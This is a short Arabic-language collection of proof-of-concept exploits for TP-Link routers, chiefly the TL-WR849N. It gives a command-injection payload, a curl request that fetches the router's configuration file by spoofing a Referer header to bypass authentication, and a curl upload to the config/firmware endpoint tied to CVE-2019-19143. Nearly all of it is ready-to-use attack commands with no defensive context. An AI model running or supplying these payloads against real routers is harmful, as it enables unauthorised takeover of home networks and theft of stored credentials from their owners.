
استغلالات إثبات المفهوم لأجهزة توجيه TP-Link، بما في ذلك ثغرات تنفيذ الأوامر عن بُعد وتجاوز المصادقة.
الحمولة: "$(ls)"
TP LINK TL-WR849N - PoC لتنفيذ الأوامر عن بُعد
الحمولة:
curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
رفع برنامج ثابت جديد دون الوصول إلى اللوحة
[CVE-2019-19143] تحديث البرنامج الثابت: رفع برنامج ثابت جديد دون الوصول إلى اللوحة
الحمولة:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F [email protected] http://192.168.0.2/cgi/confup